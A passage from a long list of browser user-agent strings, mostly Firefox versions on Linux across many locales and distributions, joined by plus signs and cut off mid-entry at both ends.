rv:1.9a1) Gecko/20051215 Firefox/1.6a1 (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20060117 Firefox/1.6a1 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20060217 Firefox/1.6a1 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20060814 Firefox/3.0a1 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b2) Gecko/2007121016 Firefox/3.0b2 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b3) Gecko/2008020513 Firefox/3.0b3 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b3pre) Gecko/2008010415 Firefox/3.0b +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b3pre) Gecko/2008020507 Firefox/3.0b3pre +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b4) Gecko/2008031317 Firefox/3.0b4 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b4pre) Gecko/2008021712 Firefox/3.0b4pre (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b4pre) Gecko/2008021714 Firefox/3.0b4pre (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9pre) Gecko/2008040318 Firefox/3.0pre (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; en-ZW; rv:1.8.0.7) Gecko/20061018 Firefox/1.5.0.7 +Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.0.4) Gecko/20060608 Ubuntu/dapper-security Firefox/1.5.0.4 +Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 +Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11 +Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12 +Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 +Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.1.6) Gecko/20070803 Firefox/2.0.0.6 (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.1.6) Gecko/20070914 Firefox/2.0.0.7 +Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.0.4) Gecko/2008111317 Linux Mint/5 (Elyssa) Firefox/3.0.4 +Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.0.4) Gecko/2008111317 Ubuntu/8.04 (hardy) Firefox/3.0.4 +Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9 +Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8 +Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 +Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9b5) Gecko/2008041514 Firefox/3.0b5 +Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.0.11) Gecko/20070327 Ubuntu/dapper-security Firefox/1.5.0.11 +Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1 +Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.0.4) Gecko/20060608 Ubuntu/dapper-security Firefox/1.5.0.4 +Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.0.7) Gecko/20060830 Firefox/1.5.0.7 (Debian-1.5.dfsg+1.5.0.7-1~bpo.1) +Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.12) Gecko/20080213 Firefox/2.0.0.12 +Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.14) Gecko/20080419 Ubuntu/8.04 (hardy) Firefox/2.0.0.14 +Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.2) Gecko/20060601 Firefox/2.0.0.2 (Ubuntu-edgy) +Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2 +Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.2) Gecko/20070225 Firefox/2.0.0.2 (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.4) Gecko/20061201 Firefox/2.0.0.4 (Ubuntu-feisty) +Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.5) Gecko/20070718 Fedora/2.0.0.5-1.fc7 Firefox/2.0.0.5 +Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.10) Gecko/2009042513 Linux Mint/5 (Elyssa) Firefox/3.0.10 +Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.10) Gecko/2009042523 Ubuntu/9.04 (jaunty) Firefox/3.0.10 +Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.11) Gecko/2009060309 Linux Mint/5 (Elyssa) Firefox/3.0.11 +Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.11) Gecko/2009060310 Ubuntu/8.10 (intrepid) Firefox/3.0.11 +Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.11) Gecko/2009061118 Fedora/3.0.11-1.fc9 Firefox/3.0.11 +Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.14) Gecko/2009090216 Firefox/3.0.14 +Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.1.6) Gecko/20091201 SUSE/3.5.6-1.1.1 Firefox/3.5.6 GTB6 +Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.1.7) Gecko/20091222 SUSE/3.5.7-1.1.1 Firefox/3.5.7 +Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.1.9) Gecko/20100317 SUSE/3.5.9-0.1 Firefox/3.5.9 +Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.2.13) Gecko/20101206 Ubuntu/9.10 (karmic) Firefox/3.6.13 +Mozilla/5.0 (X11; U; Linux i686; eu; rv:1.9.0.6) Gecko/2009012700 SUSE/3.0.6-0.1.2 Firefox/3.0.6 +Mozilla/5.0 (X11; U; Linux i686; fa; rv:1.8.1.4) Gecko/20100527 Firefox/3.6.4 +Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 +Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:1.9.0.13) Gecko/2009080315 Linux Mint/6 (Felicia) Firefox/3.0.13 +Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:1.9.0.5) Gecko/2008121622 Ubuntu/8.10 (intrepid) Firefox/3.0.5 +Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9 +Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8 +Mozilla/5.0 (X11; U; Linux i686; fr-be; rv:1.9.0.8) Gecko/2009073022 Ubuntu/9.04 (jaunty) Firefox/3.0.13 +Mozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.7.10) Gecko/20050716 Firefox/1.0.6 +Mozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.7.10) Gecko/20050925 Firefox/1.0.4 (Debian package 1.0.4-2sarge5) +Mozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.7.8) Gecko/20050511 Firefox/1.0.4 +Mozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17 +Mozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.8.1.6) Gecko/20080208 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12 +Mozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.8) Gecko/20051111 Firefox/1.5 +Mozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.9.0.5) Gecko/2008123017 Firefox/3.0.5 +Mozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.9.1) Gecko/20090624 Ubuntu/9.04 (jaunty) Firefox/3.5 +Mozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.7.10) Gecko/20050721 Firefox/1.0.6 (Ubuntu package 1.0.6) +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.7.10) Gecko/20050925 Firefox/1.0.4 (Debian package 1.0.4-2sarge5) +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.7.12) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.7.12) Gecko/20050922 Firefox/1.0.7 (Debian package 1.0.7-1) +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7) +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.7.8) Gecko/20050524 Fedora/1.0.4-4 Firefox/1.0.4 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.0.10) Gecko/20070223 Fedora/1.5.0.10-1.fc5 Firefox/1.5.0.10 pango-text +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.0.5) Gecko/20060731 Ubuntu/dapper-security Firefox/1.5.0.5 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.0.7) Gecko/20060921 Ubuntu/dapper-security Firefox/1.5.0.7 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.0.8) Gecko/20061213 Firefox/1.5.0.8 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.12) Gecko/20080208 Fedora/2.0.0.12-1.fc8 Firefox/2.0.0.12 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.19) Gecko/20081216 Ubuntu/7.10 (gutsy) Firefox/2.0.0.19 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.1) Gecko/20060601 Firefox/2.0.0.1 (Ubuntu-edgy) +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.2) Gecko/20060601 Firefox/2.0.0.2 (Ubuntu-edgy) +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.3) Gecko/20070310 Firefox/2.0.0.3 (Debian-2.0.0.3-2) +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.6) Gecko/20071008 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.8) Gecko/20071022 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.8) Gecko/20071022 Ubuntu/7.10 (gutsy) Firefox/2.0.0.8 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.8) Gecko/20071030 Fedora/2.0.0.8-2.fc8 Firefox/2.0.0.8 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1) Gecko/20060916 Firefox/2.0b2 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1) Gecko/20060918 Firefox/2.0b2 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8) Gecko/20051111 Firefox/1.5 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8) Gecko/20060110 Debian/1.5.dfsg-4 Firefox/1.5 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.10) Gecko/2009042513 Ubuntu/8.04 (hardy) Firefox/3.0.10 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.10) Gecko/2009042708 Fedora/3.0.10-1.fc10 Firefox/3.0.10 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.1) Gecko/2008070206 Firefox/2.0.0.8 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.0.2 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.2) Gecko/2008092318 Fedora/3.0.2-1.fc9 Firefox/3.0.2 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.03 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.7) Gecko/2009030422 Ubuntu/8.10 (intrepid) Firefox/3.0.7 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.7) Gecko/2009031218 Gentoo Firefox/3.0.7 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.04 (hardy) Firefox/3.0.9 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5 +Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 +Mozilla/5.0 (X11; U; Linux i686 Gentoo; en-US; rv:1.8.1.13) Gecko/20080413 Firefox/2.0.0.13 (Gentoo Linux) +Mozilla/5.0 (X11; U; Linux i686; hu-HU; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7) +Mozilla/5.0 (X11; U; Linux i686; hu-HU; rv:1.9.0.10) Gecko/2009042718 CentOS/3.0.10-1.el5.centos Firefox/3.0.10 +Mozilla/5.0 (X11; U; Linux i686; hu-HU; rv:1.9.0.7) Gecko/2009030422 Ubuntu/8.10 (intrepid) Firefox/3.0.7 FirePHP/0.2.4 +Mozilla/5.0 (X11; U; Linux i686; hu-HU; rv:1.9.1.9) Gecko/20100330 Fedora/3.5.9-1.fc12 Firefox/3.5.9 +Mozilla/5.0 (X11; U; Linux i686; hu; rv:1.8.0.7) Gecko/20060911 SUSE/1.5.0.7-0.1 Firefox/1.5.0.7 +Mozilla/5.0 (X11; U; Linux i686; hu; rv:1.8.1.1) Gecko/20061208 Firefox/2.0.0.1 +Mozilla/5.0 (X11; U; Linux i686; hu; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2 +Mozilla/5.0 (X11; U; Linux i686; hu; rv:1.8.1.8) Gecko/20071022 Ubuntu/7.10 (gutsy) Firefox/2.0.0.8 +Mozilla/5.0 (X11; U; Linux i686; hu; rv:1.8b4) Gecko/20050827 Firefox/1.0+ +Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7) +Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.11) Gecko/2009060308 Linux Mint/7 (Gloria) Firefox/3.0.11 +Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5 +Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8 +Mozilla/5.0 (X11; U; Linux i686; it; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1 +Mozilla/5.0 (X11; U; Linux i686; it; rv:1.8.1.14) Gecko/20080416 Fedora/2.0.0.14-1.fc7 Firefox/2.0.0.14 +Mozilla/5.0 (X11; U; Linux i686; it; rv:1.8.1.14) Gecko/20080420 Firefox/2.0.0.14 +Mozilla/5.0 (X11; U; Linux i686; it; rv:1.8.1.3) Gecko/20070406 Firefox/2.0.0.3 +Mozilla/5.0 (X11; U; Linux i686; it; rv:1.8.1.3) Gecko/20070410 Firefox/2.0.0.3 +Mozilla/5.0 (X11; U; Linux i686; it; rv:1.8.1.4) Gecko/20060601 Firefox/2.0.0.4 (Ubuntu-edgy) +Mozilla/5.0 (X11; U; Linux i686; it; rv:1.8.1.4) Gecko/20070621 Firefox/2.0.0.4 +Mozilla/5.0 (X11; U; Linux i686; it; rv:1.8) Gecko/20060113 Firefox/1.5 +Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.0.11) Gecko/2009061118 Fedora/3.0.11-1.fc10 Firefox/3.0.11 +Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.0.2 +Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 +Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.0.4) Gecko/2008111217 Red Hat Firefox/3.0.4 +Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.0.5) Gecko/2008121711 Ubuntu/9.04 (jaunty) Firefox/3.0.5 +Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9) Gecko/2008061015 Firefox/3.0 +Mozilla/5.0 (X11; U; Linux i686; ja-JP; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11 +Mozilla/5.0 (X11; U; Linux i686; ja-JP; rv:1.9.1.8) Gecko/20100216 Fedora/3.5.8-1.fc12 Firefox/3.5.8 +Mozilla/5.0 (X11; U; Linux i686; ja; rv:1.8.0.10) Gecko/20070510 Fedora/1.5.0.10-6.fc6 Firefox/1.5.0.10 +Mozilla/5.0 (X11; U; Linux i686; ja; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 +Mozilla/5.0 (X11; U; Linux i686; ja; rv:1.8.1.11) Gecko/20071128 Firefox/2.0.0.11 (Debian-2.0.0.11-1) +Mozilla/5.0 (X11; U; Linux i686; ja; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3 +Mozilla/5.0 (X11; U; Linux i686; ja; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty) +Mozilla/5.0 (X11; U; Linux i686; ja; rv:1.9.0.5) Gecko/2008121622 Ubuntu/8.10 (intrepid) Firefox/3.0.5 +Mozilla/5.0 (X11; U; Linux i686; ja; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729) +Mozilla/5.0 (X11; U; Linux i686; ko-KR; rv:1.8.0.7) Gecko/20060913 Fedora/1.5.0.7-1.fc5 Firefox/1.5.0.7 pango-text +Mozilla/5.0 (X11; U; Linux i686; ko-KR; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 +Mozilla/5.0 (X11; U; Linux i686; ko-KR; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12 +Mozilla/5.0 (X11; U; Linux i686; ko-KR; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3 +Mozilla/5.0 (X11; U; Linux i686; lt-LT; rv:1.6) Gecko/20051114 Firefox/1.5 +Mozilla/5.0 (X11; U; Linux i686; lt; rv:1.6) Gecko/20051114 Firefox/1.5 +Mozilla/5.0 (X11; U; Linux i686; nb-NO; rv:1.8.1.3) Gecko/20070310 Firefox/2.0.0.3 (Debian-2.0.0.3-1) +Mozilla/5.0 (X11; U; Linux i686; nl-NL; rv:1.8.1.9) Gecko/20071105 Firefox/2.0.0.9 +Mozilla/5.0 (X11; U; Linux i686; nl-NL; rv:1.9.0.19) Gecko/20090720 Firefox/3.5.1 +Mozilla/5.0 (X11; U; Linux i686; nl-NL; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 +Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.8.0.12) Gecko/20070601 Ubuntu/dapper-security Firefox/1.5.0.12 +Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.8.0.4) Gecko/20060608 Ubuntu/dapper-security Firefox/1.5.0.4 +Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 +Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.8.1.1) Gecko/20070311 Firefox/2.0.0.1 +Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.8.1.3) Gecko/20060601 Firefox/2.0.0.3 (Ubuntu-edgy) +Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 +Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.0.11) Gecko/2009060309 Ubuntu/8.04 (hardy) Firefox/3.0.4 +Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 +Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.0.4) Gecko/2008111317 Ubuntu/8.04 (hardy) Firefox/3.0.4 +Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 +Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.1.9) Gecko/20100401 Ubuntu/9.10 (karmic) Firefox/3.5.9 +Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.2.15) Gecko/20110303 Ubuntu/8.04 (hardy) Firefox/3.6.15 +Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.9) Gecko/2008061015 Firefox/3.0 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.7.10) Gecko/20050717 Firefox/1.0.6 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.7.10) Gecko/20050730 Firefox/1.0.6 (Debian package 1.0.6-2) +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7) +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.8.0.1) Gecko/20060313 Fedora/1.5.0.1-9 Firefox/1.5.0.1 pango-text Mnenhy/0.7.3.0 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.8.0.4) Gecko/20060608 Ubuntu/dapper-security Firefox/1.5.0.4 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.8.0.5) Gecko/20060731 Ubuntu/dapper-security Firefox/1.5.0.5 Mnenhy/0.7.4.666 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox) Mnenhy/0.7.4.666 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.8.1.10) Gecko/20071126 Ubuntu/7.10 (gutsy) Firefox/2.0.0.10 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.8.1.10) Gecko/20071128 Fedora/2.0.0.10-2.fc7 Firefox/2.0.0.10 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.8.1.10) Gecko/20071213 Fedora/2.0.0.10-3.fc8 Firefox/2.0.0.10 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.8.1.2) Gecko/20060601 Firefox/2.0.0.2 (Ubuntu-edgy) +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.8.1.3) Gecko/20061201 Firefox/2.0.0.3 (Ubuntu-feisty) +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.8.1.8) Gecko/20071022 Ubuntu/7.10 (gutsy) Firefox/2.0.0.8 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.8.1) Gecko/20061010 Firefox/2.0 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.10) Gecko/2009042513 Ubuntu/8.04 (hardy) Firefox/3.0.10 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.1) Gecko/2008071222 Firefox/3.0.1 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.1) Gecko/2008071719 Firefox/3.0.1 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.3) Gecko/2008092700 SUSE/3.0.3-2.2 Firefox/3.0.3 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.4) Gecko/20081031100 SUSE/3.0.4-4.6 Firefox/3.0.4 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.5) Gecko/2008121300 SUSE/3.0.5-0.1 Firefox/3.0.5 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.5) Gecko/2008121622 Slackware/2.6.27-PiP Firefox/3.0 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.7) Gecko/2009030422 Kubuntu/8.10 (intrepid) Firefox/3.0.9 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.7) Gecko/2009030503 Fedora/3.0.7-1.fc10 Firefox/3.0.7 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.10 (intrepid) Firefox/3.0.9 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.2.10) Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9b4) Gecko/2008030800 SUSE/2.9.94-4.2 Firefox/3.0b4 +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5 +Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12 +Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1 +Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1 Ubuntu +Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.1) Gecko/20060201 Firefox/1.5.0.1 (Swiftfox) Mnenhy/0.7.3.0 +Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.1) Gecko/20060313 Fedora/1.5.0.1-9 Firefox/1.5.0.1 pango-text Mnenhy/0.7.3.0 +Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.4) Gecko/20060527 SUSE/1.5.0.4-1.7 Firefox/1.5.0.4 Mnenhy/0.7.4.0 +Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.4) Gecko/20060614 Fedora/1.5.0.4-1.2.fc5 Firefox/1.5.0.4 pango-text Mnenhy/0.7.4.0 +Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1 (Ubuntu-edgy) +Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2 +Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6 +Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1 +Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1) Gecko/20061003 Firefox/2.0 Ubuntu +Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1) Gecko/20061010 Firefox/2.0 +Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1) Gecko/20061010 Firefox/2.0 Ubuntu +Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1) Gecko/20061127 